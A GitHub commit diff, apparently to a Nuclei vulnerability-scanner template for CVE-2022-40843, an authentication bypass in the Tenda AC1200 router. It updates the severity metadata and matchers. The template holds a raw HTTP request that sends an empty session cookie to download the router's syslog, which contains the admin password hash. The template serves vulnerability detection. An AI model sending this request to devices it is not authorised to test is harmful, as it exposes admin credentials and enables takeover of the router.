updated matcher & info

patch-1
Ritik Chaddha 2023-08-01 11:43:38 +05:30 committed by GitHub
parent 947d3ce87f
commit 935906680d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 15 additions and 8 deletions

View File

@ -8,29 +8,36 @@ info:
The Tenda AC1200 V-W15Ev2 router is affected by improper authorization/improper session management. The software does not perform or incorrectly perform an authorization check when a user attempts to access a resource or perform an action. This allows the router's login page to be bypassed. The improper validation of user sessions/authorization can lead to unauthenticated attackers having the ability to read the router's file, which contains the MD5 password of the Administrator's user account. This vulnerability exists within the local web and hosted remote management console.
reference:
- https://boschko.ca/tenda_ac1200_router
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40843
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L
cvss-score: 9.9
cve-id: CVE-2022-40843
cwe-id: CWE-78
tags: cve,cve2022,tenda,auth-bypass,router
cwe-id: CWE-287
metadata:
max-request: 1
tags: cve,cve2022,tenda,auth-bypass,router,iot
requests:
- raw:
- |
GET /goform/downloadSyslog/syslog.log HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Cookie: W15Ev2_user=
Connection: close
matchers-condition: and
matchers:
- type: regex
regex:
- '^0\d{3}$'
- type: word
part: body
words:
- "0001"
- "0002"
condition: and
- "[system]"
- "[error]"
- "[wan1]"
condition: or
- type: word
part: header